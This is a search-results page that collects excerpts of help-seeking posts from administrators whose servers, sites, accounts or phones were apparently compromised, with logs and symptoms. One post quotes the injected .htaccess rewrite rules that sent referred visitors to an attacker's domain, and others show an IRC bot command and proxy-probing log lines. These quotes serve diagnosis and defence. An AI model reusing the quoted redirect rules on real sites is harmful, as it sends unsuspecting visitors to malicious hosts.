Search Results

Search found 374 results on 15 pages for 'hacked'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 2/15 | < Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Registry remotley hacked win 7 need help tracking the perp

    - by user577229
    I was writing some .VBS code at thhe office that would allow certain file extensions to be downloaded without a warning dialog on a w7x32 system. The system I was writing this on is in a lab on a segmented subnet. All web access is via a proxy server. The only means of accessing my machine is via the internet or from within the labs MSFT AD domain. While writing and testing my code I found a message of sorts. Upon refresing the registry to verify my code changed a dword, instead the message HELLO was written and visible in regedit where the dword value wass called for. I took a screen shot and proceeded to edit my code. This same weird behavior occurred last time I was writing registry code except on another internal server. I understand that remote registry access exists for windows systems. I will block this immediately once I return to the office. What I want to know is, can I trace who made this connection? How would I do this? I suspect the cause of this is the cause of other "odd" behaviors I'm experiencing at work such as losing control of my input director master control for over an hour and unchanged code that all of a sudden fails for no logical region. These failures occur at funny times, whenver I'm about to give a demonstration of my test code. I know this sounds crazy however knowledge of the registry component makes this believable. Once the registry can be accessed, the entire system is compromised. Any help or sanity checking is appreciated.

    Read the article

  • SMTP hacked by spammer using base64 encoding to authenticate

    - by Throlkim
    Over the past day we've detected someone from China using our server to send spam email. It's very likely that he's using a weak username/password to access our SMTP server, but the problem is that he appears to be using base64 encoding to prevent us from finding out which account he's using. Here's an example from the maillog: May 5 05:52:15 195396-app3 smtp_auth: SMTP connect from (null)@193.14.55.59.broad.gz.jx.dynamic.163data.com.cn [59.55.14.193] May 5 05:52:15 195396-app3 smtp_auth: smtp_auth: SMTP user info : logged in from (null)@193.14.55.59.broad.gz.jx.dynamic.163data.com.cn [59.55.14.193] Is there any way to detect which account it is that he's using?

    Read the article

  • My gmail password hacked in Firefox?

    - by ellockie
    While writing a message using Firefox suddenly my gmail login details, including password, were pasted into the body of my message at the current cursor position and in the browser's find field (whole password and a bit of email address in the latter). I don't store my passwords in the browser nor in any of it's addons, although I keep it in one of Chrome's extensions. I don't use whole email address to login, only the user name, so it's very strange and worrying. I must admit I clicked some suspicious link the same day (by checking the root of the domain first), but I quickly closed that page and after that I haven't used that password. Both Avira and Spybot didn't detect anything. What was it and what can I do to make sure my browser is safe?

    Read the article

  • My servers been hacked EMERGENCY

    - by Grant unwin
    I'm on my way into work at 9.30 pm on a Sunday because our server has been compromised somehow and was resulting in a DOS attack on our provider. The servers access to the Internet has been shut down which means over 5-600 of our clients sites are now down. Now this could be an FTP hack, or some weakness in code somewhere I'm not sure till j get there. Does anyone have any tips on how I can track this down quickly. Were in for a whole lot of litigation if I dont get the server back up asap. Any help appreciated.

    Read the article

  • Windows File Checksums - Is my system hacked?

    - by rism
    I would like to know if there is a utility to verify the checksums of every windows file on my Win 7 Ultimate system. It seems on the surface such an obvious utility but I dont ever remember seeing one? I had a very weird experience while surfing earlier today and now Im not entirely sure my system is secure. I have a collection of tools in the WSCC suite but these tools no doubt just make system calls to the win32 api and if that has been subverted then the tools are practically useless. How do I know my Win 7 files are actually Win 7 files? I am particularly interested in verifying the integrity of all network TCP/IP files.

    Read the article

  • Could this server log mean my server is being used as a proxy?

    - by So Over It
    I came across the following entry in my access.log: 58.218.199.147 - - [05/Jun/2012:12:56:04 +1000] "GET http://proxyproxys.com/ HTTP/1.1" 200 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Normally when I see a full URL entry in my access.log I assume it is log spam with people trying to get me to access their site. These entries are normally followed with a 404 response. The above entry is followed with a 200 'success' response! Doing some searching it would seem that this can occur when someone is trying to use your server as a proxy. This disturbed me more - especially because the URL in question has the word proxy in it. Going to the site 'proxyproxys.com' (using hidemyass.com to protect my own identity), the site returns what appears to be some sort of 'proxy judge' ---------------------------------------- HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8 HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.53 Safari/536.5 HTTP_CONNECTION=close REMOTE_PORT=56355 REMOTE_HOST=74.63.112.142 REMOTE_ADDR=74.63.112.142 ---------------------------------------- CS_ProxyJudge Result=HIGH_ANONYMITY ---------------------------------------- Question: 1) does the 200 success mean that someone has been able to successfully use my server as a proxy? 2) are there other means of confirming if my server is being used as a proxy 3) can you refer me to documentation to help 'close up' my security gap if there is one. Thanks.

    Read the article

  • linux centos 5.6 someone installed irc

    - by Peter
    I need some help, my server provider contacted me to tell me my server was using 200mbit/s bandwidth. Upon investigation I found processes for a user that should not be there.. I found processes as follows: 26269 511 Nov27 ./stealth 58.22.68.253 53 775 511 Oct12 ./eggdrop -m botnick.conf I know eggdrop is IRC, my question is, where can I find out where the software has been installed for these processes?

    Read the article

  • My website is infected, I restored a backup of the uninfected files, how long will it take to un-mark as dangerous?

    - by Cyclone
    My website www.sagamountain.com was recently infected by a malware distributor (or at least I think it may have been). I have removed all external content, google ads, firefly chat, etc. I uploaded a backup from a few weeks ago, when there was no issue. I patched the SQL injection hole. Now, how long will it take to unmark it as dangerous? Where can I contact google? I am not sure if this is the right place to post it, but since it may have been a server issue I may as well. Can sites inject base64 code via a virus on the whole server, or is it only via sql injection? Thanks for the help, viruses freak me out. Is there an online virus scanner that can scan my page and tell me what is wrong?

    Read the article

  • Strange stuff in apache log

    - by aL3xa
    Hi lads, I'm building some kind of webapp, and currently the whole thing runs on my machine. I was combing down my logs, and found several "strange" log entries that made me a bit paranoid. Here goes: ***.***.***.** - - [19/Dec/2010:19:47:47 +0100] "\x99\x91g\xca\xa8" 501 1054 **.***.***.** - - [19/Dec/2010:20:14:58 +0100] "<}\xdbe\x86E\x18\xe7\x8b" 501 1054 **.**.***.*** - - [21/Dec/2010:15:28:14 +0100] "J\xaa\x9f\xa3\xdd\x9c\x81\\\xbd\xb3\xbe\xf7\xa6A\x92g'\x039\x97\xac,vC\x8d\x12\xec\x80\x06\x10\x8e\xab7e\xa9\x98\x10\xa7" 501 1054 Bloody hell... what is this?!

    Read the article

  • Website visitors are still being redirected after "fixing" the damage from a conditional redirect website attack

    - by Shannon
    BACKGROUND A website of mine was recently the target of a conditional redirect attack. PHP code was added to my pages to redirect visitors. The .htaccess file was edited to redirect visitors. I've re-uploaded my website so the compromised PHP and .htaccess code have both been removed. My site is mostly handwritten php and static HTML content. I don't use page comments or any third party libraries. THE PROBLEM After removing the compromised php and htaccess files, visitors are still being re-directed. What could be the reason that visitors are still being redirected? Are there any tools to check where/how redirects are taking place so I can debug the problem? UPDATE - PROBLEM FIXED As suggested in the comments, I cleared my Firefox cache and that fixed the problem (for me anyway). Visitors with old cache data will obviously still be re-directed.

    Read the article

  • Attempted hack on VPS, how to protect in future, what were they trying to do?

    - by Moin Zaman
    UPDATE: They're still here. Help me stop or trap them! Hi SF'ers, I've just had someone hack one of my clients sites. They managed to get to change a file so that the checkout page on the site writes payment information to a text file. Fortunately or unfortunately they stuffed up, the had a typo in the code, which broke the site so I came to know about it straight away. I have some inkling as to how they managed to do this: My website CMS has a File upload area where you can upload images and files to be used within the website. The uploads are limited to 2 folders. I found two suspicious files in these folders and on examining the contents it looks like these files allow the hacker to view the server's filesystem and upload their own files, modify files and even change registry keys?! I've deleted some files, and changed passwords and am in the process of trying to secure the CMS and limit file uploads by extensions. Anything else you guys can suggest I do to try and find out more details about how they got in and what else I can do to prevent this in future?

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • Boot log from remotely managed/hacked iPhone for analysis

    - by user1319903
    in reference to my other post. syslog captured immediately after a hard reset for analysis of foul play. Apr 8, 2012 10:08:36 PM - dataaccessd [53] (Notice): 137860|CoreDAV|Warn |Account "iCloud" couldn't reach the server at p03-contacts.icloud.com: Error Domain=NSURLErrorDomain Code=-1009 "The Internet connection appears to be offline." UserInfo=0xde63920 {NSErrorFailingURLStringKey=https://%[email protected]/159665024/principal/, NSErrorFailingURLKey=https://%[email protected]/ /principal/, NSLocalizedDescription=The Internet connection appears to be offline., NSUnderlyingError=0xde7dc00 "The Internet connection appears to be offline."} Apr 8, 2012 10:08:36 PM - UserEventAgent [12] (Warning): TRACE: connection interrupted Apr 8, 2012 10:08:36 PM - UserEventAgent [12] (Warning): DEBUG: disconnected Apr 8, 2012 10:08:36 PM - UserEventAgent [12] (Warning): TRACE: Canceling Apr 8, 2012 10:08:36 PM - UserEventAgent [12] (Warning): TRACE: connection invalid Apr 8, 2012 10:08:35 PM - kernel [0] (Debug): launchd[82] Builtin profile: container (sandbox) Apr 8, 2012 10:08:35 PM - kernel [0] (Debug): launchd[82] Container: /private/var/mobile/Applications/048D35CA-6427-4EC8-8B76-A194697A7CE9 [69] (sandbox) Apr 8, 2012 10:08:35 PM - wifid [29] (Error): WiFi:[355640915.904103]: Client dataaccessd set type to background application Apr 8, 2012 10:08:35 PM - dataaccessd [53] (Notice): 137860|DA|Warn |Delegate 5ADDBE3B-D5FD-43E1-87D4-C1153733EFAB finished a refresh but it is not registered with the refresh manager Apr 8, 2012 10:08:34 PM - timed [31] (Notice): (Note ) CoreTime: Not setting system time to 04/09/2012 05:08:34 from GPS because time is unchanged Apr 8, 2012 10:08:34 PM - timed [31] (Notice): (Note ) CoreTime: Not setting time zone to America/Los_Angeles from NITZ Apr 8, 2012 10:08:33 PM - kernel [0] (Debug): AppleKeyStore:cp_key_store_action(1) Apr 8, 2012 10:08:33 PM - kernel [0] (Debug): AppleKeyStore:Sending lock change Apr 8, 2012 10:08:32 PM - profiled [20] (Notice): (Note ) profiled: Device unlock notification received Apr 8, 2012 10:08:31 PM - softwareupdated [37] (Notice): 3e828d98 : Cleaning up unused prepared updates Apr 8, 2012 10:08:27 PM - mstreamd [43] (Warning): PSDLog: Can't return photoStreamsPublishStreamID because no Apple Account has Photo Streams enabled Apr 8, 2012 10:08:27 PM - mstreamd [43] (Notice): (Note ) mstreamd: Not listening to push notifications. Apr 8, 2012 10:08:27 PM - mstreamd [43] (Warning): PSDLog: Can't return photoStreamsPublishStreamID because no Apple Account has Photo Streams enabled Apr 8, 2012 10:08:27 PM - mstreamd [43] (Notice): (Note ) mstreamd: Not listening to push notifications. Apr 8, 2012 10:08:27 PM - mstreamd [43] (Notice): (Note ) mstreamd: Retrieved push tokens. Dev: 0, Prod: 0 Apr 8, 2012 10:08:27 PM - mstreamd [43] (Notice): (Note ) mstreamd: Media stream daemon starting... Apr 8, 2012 10:08:26 PM - SpringBoard [15] (Notice): SMSCTServer is available and ready to rock. Apr 8, 2012 10:08:26 PM - SpringBoard [15] (Error): mms: * isMmsConfigured = 1 Apr 8, 2012 10:08:26 PM - MobilePhone [79] (Warning): Connection lost, retrying with key exchange. Apr 8, 2012 10:08:26 PM - MobilePhone [79] (Warning): Connection lost, retrying with key exchange. Apr 8, 2012 10:08:26 PM - MobilePhone [79] (Warning): Connection lost, retrying with key exchange. Apr 8, 2012 10:08:26 PM - MobilePhone [79] (Warning): Connection lost, retrying with key exchange. Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Warning): BT: failed to get connectable state with error 111 Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Error): WiFi: Consulting "no-sdio-devices" property. Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Error): WiFi: "no-sdio-devices" property not found. Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Warning): SMS Plugin initialized. Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Warning): Telephony plugin initialized Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Warning): SIMToolkit plugin for SpringBoard initialized. Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Error): WiFi: Consulting "no-sdio-devices" property. Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Error): WiFi: "no-sdio-devices" property not found. Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Warning): WiFi picker plugin initialized Apr 8, 2012 10:08:25 PM - SpringBoard [15] (Warning): EKAlarmEngine: Region monitoring not available or enabled. Trigger ignored! Apr 8, 2012 10:08:24 PM - kernel [0] (Debug): AppleH4CamIn::setPowerStateGated: 0 Apr 8, 2012 10:08:24 PM - kernel [0] (Debug): AppleH4CamIn::power_off_hardware Apr 8, 2012 10:08:24 PM - SpringBoard [15] (Notice): IOMobileFrameBufferGetMirroringCapability returning -536870201 via kIOMFBConnectMethod_GetMirroringCapability  Apr 8, 2012 10:08:24 PM - aggregated [61] (Warning): PLAggregateState Error: Leaving state unplugged_screen_off even though we are not in it, doing nothing Apr 8, 2012 10:08:24 PM - aggregated [61] (Warning): PLAggregateState Error: Entering state unplugged_screen_on even though we are already in it, doing nothing Apr 8, 2012 10:08:24 PM - wifid [29] (Error): WiFi:[355640904.616440]: Disable WoW requested by "spd" Apr 8, 2012 10:08:24 PM - SpringBoard [15] (Warning): Application windows are expected to have a root view controller at the end of application launch Apr 8, 2012 10:08:23 PM - SpringBoard [15] (Warning): BTM: attaching to BTServer Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_LoadFirmware_gated: fw len=1232920 Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_LoadFirmware_gated - firmware checksum: 0x05935019 Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::power_on_hardware Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_Init - No set-file loaded for camera channel 0 Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_Init - No set-file loaded for camera channel 1 Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_InitialSensorDetection - found sensor on chan 0: 0x0145 Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_InitialSensorDetection - found sensor on chan 1: 0x7736 Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::power_off_hardware Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_LoadSetfile_gated (camChan=0) Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::ISP_LoadSetfile_gated (camChan=1) Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::setPowerStateGated: 1 Apr 8, 2012 10:08:23 PM - kernel [0] (Debug): AppleH4CamIn::power_on_hardware Apr 8, 2012 10:08:23 PM - profiled [20] (Notice): (Note ) profiled: Locking device Apr 8, 2012 10:08:22 PM - kernel [0] (Debug): HighlandParkResourceMgr::AddFirmware() {'cdma', '    '} added to resources Apr 8, 2012 10:08:22 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::gated_registerFunction Register function PTP Apr 8, 2012 10:08:22 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::gated_registerFunction all functions registered- we are ready to start usb stack Apr 8, 2012 10:08:22 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::handleUSBCableDisconnect Apr 8, 2012 10:08:22 PM - kernel [0] (Debug): HighlandParkResourceMgr::AddFirmware() {'gsm ', 'nb  '} added to resources Apr 8, 2012 10:08:22 PM - kernel [0] (Debug): HighlandParkResourceMgr::AddFirmware() {'gsm ', 'wb  '} added to resources Apr 8, 2012 10:08:22 PM - MRMLowDiskUEA [12] (Notice): MobileDelete: LowDisk Plugin: start Apr 8, 2012 10:08:22 PM - MRMLowDiskUEA [12] (Notice): kqueue registration successful Apr 8, 2012 10:08:22 PM - mediaserverd [44] (Error): 22:08:22.522867 com.apple.AVConference: /SourceCache/GameKitServices/GameKitServices-344.21/AVConference.subproj/Sources/AVConferenceServer.m:1867: AVConferenceServerStart Apr 8, 2012 10:08:22 PM - CommCenter [18] (Notice): Carrier bundle value for recipient address: 28818773 Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice - Configuration: PTP Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: PTP Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice - Configuration: iPod USB Interface Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: USBAudioControl Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: USBAudioStreaming Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: IapOverUsbHid Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice - Configuration: PTP + Apple Mobile Device Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: PTP Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: AppleUSBMux Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice - Configuration: PTP + Apple Mobile Device + Apple USB Ethernet Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: PTP Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: AppleUSBMux Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice          Interface: AppleUSBEthernet Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): IOAccessoryPortUSB::start Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::gated_registerFunction Register function USBAudioControl Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): virtual bool AppleUSBDeviceMux::start(IOService*) build: Feb  1 2012 23:16:46 Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): init_waste Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::gated_registerFunction Register function AppleUSBMux Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::gated_registerFunction Register function IapOverUsbHid Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::gated_registerFunction Register function USBAudioStreaming Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleSynopsysOTGDevice::gated_registerFunction Register function AppleUSBEthernet Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleUSBEthernetDevice::start: Host MAC address = 02:(this Mac address does not physically exist) -edit Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): AppleUSBEthernetDevice: Ethernet address  Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): BTServer[66] Builtin profile: BlueTool (sandbox) Apr 8, 2012 10:08:21 PM - kernel [0] (Debug): BTServer[66] Builtin profile: BlueTool (sandbox) Apr 8, 2012 10:08:21 PM - hpfd [50] (Notice): firmware resource loaded { 'cdma' '    ' } Apr 8, 2012 10:08:21 PM - wifid [29] (Error): WiFi:[355640901.282776]: Could not read APPLE80211_IOC_SUPPORTED_CHANNELS err=82 Apr 8, 2012 10:08:21 PM - wifid [29] (Error): WiFi:[355640901.312786]: Client itunesstored is background application Apr 8, 2012 10:08:21 PM - timed [31] (Notice): (Note ) CoreTime: Want active time in 38.24hrs. Need active time in 121.57hrs. Apr 8, 2012 10:08:21 PM - SpringBoard [15] (Notice): MultitouchHID: detection mode: 255-0 (deferring until bootloaded) Apr 8, 2012 10:08:21 PM - CLTM [12] (Error): CLTM: resetting temps: now = 1333948101, last update = -2147483648 Apr 8, 2012 10:08:21 PM - locationd [28] (Error): WiFi:[355640901.852993]: WiFiManager now available Apr 8, 2012 10:08:21 PM - OTACrashCopier [62] (Notice): (Warn ) Failed to read attributes from '/var/mobile/Library/OTALogging/.last_successful_submission_marker' Apr 8, 2012 10:08:21 PM - hpfd [50] (Notice): firmware resource loaded { 'gsm ' 'nb  ' } Apr 8, 2012 10:08:21 PM - hpfd [50] (Notice): firmware resource loaded { 'gsm ' 'wb  ' } Apr 8, 2012 10:08:20 PM - kernel [0] (Debug): AppleBCMWLANCore::initFirmware(): successful initialization Apr 8, 2012 10:08:20 PM - kernel [0] (Debug): AppleBCMWLANCore:initFirmware(): 2496 PropTxStatus feature is not enabled for this platform  Apr 8, 2012 10:08:20 PM - kernel [0] (Debug): AppleBCMWLANCore::initDongle():: creating virtual interface with prefix = ap Apr 8, 2012 10:08:20 PM - kernel [0] (Debug): AppleBCMWLANCore::initDongle(): Core Driver Initialization Time 19.38798583 Apr 8, 2012 10:08:20 PM - kernel [0] (Debug): 000019.281423 hsic-baseband::safetyNet: port is not connected Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 _create_cesm_vault: try to create blob Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 load_activation_records: This is the default record Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 _create_cesm_vault: blob written Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 ping_configd: Not setting host name, it already has one: Pete's iPod  Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 lookup_baseband_info_new: radio not ready: kCTPostponementStatusNotReady Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 load_activation_records: This is the default record Apr 8, 2012 10:08:20 PM - SpringBoard [15] (Error): WiFi: Consulting "no-sdio-devices" property. Apr 8, 2012 10:08:20 PM - SpringBoard [15] (Error): WiFi: "no-sdio-devices" property not found. Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 determine_activation_state_new: Original act. state: Activated Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 determine_activation_state_new: radio not ready, don't change activation status, wait for notification, status: kCTPostponementStatusNotReady Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 determine_activation_state_new: Activation state now is Activated Apr 8, 2012 10:08:20 PM - SpringBoard [15] (Warning): lockdown says the device is: [Activated], state is 3 Apr 8, 2012 10:08:20 PM - SpringBoard [15] (Warning): lockdown says we've previously registered: [1], state is 1 Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 notification_worker: now listening for CT notifications Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 notification_worker: we've registered for notifications, now make sure we didn't miss one... Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 load_activation_records: This is the default record Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 determine_activation_state_new: Original act. state: Activated Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 determine_activation_state_new: radio not ready, don't change activation status, wait for notification, status: kCTPostponementStatusNotReady Apr 8, 2012 10:08:20 PM - lockdownd [23] (Notice): 3e828d98 determine_activation_state_new: Activation state now is Activated Apr 8, 2012 10:08:20 PM - SpringBoard [15] (Notice): Posting 'com.apple.iokit.hid.displayStatus' notifyState=1 Apr 8, 2012 10:08:20 PM - SpringBoard [15] (Notice): __IOHIDLoadBundles: Loaded 1 HID plugin Apr 8, 2012 10:08:19 PM - wifiFirmwareLoader [30] (Warning): [    18.778 sec] Downloaded firmware, 192512 bytes Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleKeyStore:cp_key_store_action(0) Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleMultitouchN1SPI: downloaded 128 bytes of prox calibration data ("built-in") Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleMultitouchN1SPI: downloaded 1024 bytes of calibration data ("built-in") Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::attachBusGated(): Bus Driver Initialization Time 18.266927958 Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore:attachBusGated(): Starting with MAC Address: 00:f4:b9:2f:d9:8d Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANFirmwareManager::setNVRAMData(): received 778 bytes Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore: Ethernet address 00:f4:b9:2f:d9:8d Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): Loading syscfg. Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleMultitouchN1SPI: downloaded 56264 bytes of firmware data ("0x0084.bin") in 152ms. Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::apple80211_ioctl() Driver not yet initialized, cannot process ioctl Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::apple80211_ioctl() Driver not yet initialized, cannot process ioctl Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AirPort: Enabled AppleBCMWLANCore (link 0, sys 0, user 0) Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::apple80211_ioctl() Driver not yet initialized, cannot process ioctl Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::apple80211_ioctl() Driver not yet initialized, cannot process ioctl Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANBusInterfaceHSIC::loadFirmware(): DL Ver: chip 0x4330, chiprev 0x4 Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): BTServer[66] Builtin profile: BlueTool (sandbox) Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): BCMWLAN Firmware Version: wl0: Dec 22 2011 19:03:58 version 5.95.45 Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::initFirmware(): Firmware supports ap mode; enabling apsta feature (currently enabled) Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::initFirmware(): country code set to XX Apr 8, 2012 10:08:19 PM - configd [14] (Notice): network configuration changed. Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCmdManager::processResponse(): Firmware Error "BCOM Unsupported" on command "WLC_SET_VAR: bus:txglom" (263). Transaction ID 3, length 0 Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::initFirmware(): Glomming not supported on this device: BCOM Unsupported Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::initFirmware: apsta set to 1 Apr 8, 2012 10:08:19 PM - kernel [0] (Debug): AppleBCMWLANCore::handleEventPacket(): WLC_E_FIFO_CREDIT_MAP,length 6 [9 2 5 3 2] Apr 8, 2012 10:08:19 PM - iapd [49] (Error): Timed out trying to acquire capabilities data. Apr 8, 2012 10:08:19 PM - softwareupdated [37] (Notice): 3e828d98 : Cleaning up unused prepared updates Apr 8, 2012 10:08:19 PM - com.apple.misd [63] (Notice): allowing special port forwarding for test fixtures Apr 8, 2012 10:08:19 PM - hpfd [50] (Notice): resource request { 'N94 ', '    ' } Apr 8, 2012 10:08:19 PM - mstreamd [43] (Notice): (Note ) mstreamd: mstreamd starting up. Apr 8, 2012 10:08:18 PM - kernel [0] (Debug): launchd[44] Builtin profile: mediaserverd (sandbox) Apr 8, 2012 10:08:18 PM - kernel [0] (Debug): launchd[49] Builtin profile: iapd (sandbox) Apr 8, 2012 10:08:18 PM - kernel [0] (Debug): launchd[53] Builtin profile: dataaccessd (sandbox) Apr 8, 2012 10:08:18 PM - kernel [0] (Debug): launchd[60] Builtin profile: apsd (sandbox) Apr 8, 2012 10:08:18 PM - kernel [0] (Debug): launchd[66] Builtin profile: BTServer (sandbox) Apr 8, 2012 10:08:18 PM - mDNSResponder [46] (Error): mDNSResponder mDNSResponder-329.10 (Jan 15 2012 19:07:41) starting iOSVers 9 Apr 8, 2012 10:08:18 PM - mDNSResponder [46] (Error): Note: SetDomainSecrets: no keychain support Apr 8, 2012 10:08:18 PM - mDNSResponder [46] (Error): Note: Compiled without SnowLeopard Fine-Grained Power Management support Apr 8, 2012 10:08:18 PM - fseventsd [51] (Critical): event logs in /private/var/.fseventsd out of sync with volume.  destroying old logs. (10083 7 10090) Apr 8, 2012 10:08:18 PM - fseventsd [51] (Critical): log dir: /private/var/.fseventsd getting new uuid: 8778E61A-0283-4067-B7DF-F75D109983D1 Apr 8, 2012 10:08:18 PM - fseventsd [51] (Error): failed to make the directory /.fseventsd (30/Read-only file system) Apr 8, 2012 10:08:18 PM - fseventsd [51] (Critical): could not open < (No such file or directory) Apr 8, 2012 10:08:18 PM - fseventsd [51] (Critical): log dir: /tmp getting new uuid: 3919EB54-A54F-4289-864A-5158A25EF9DA Apr 8, 2012 10:08:18 PM - wifid [29] (Error): WiFi:[355640898.328610]: WiFi Preferences is up to date Apr 8, 2012 10:08:18 PM - mDNSResponder [46] (Error): D2DInitialize succeeded Apr 8, 2012 10:08:18 PM - fairplayd.N94 [52] (Notice): Vroum Apr 8, 2012 10:08:18 PM - wifid [29] (Error): WiFi:[355640898.537219]: WiFiManager starting, version: WiFiManager-260.9 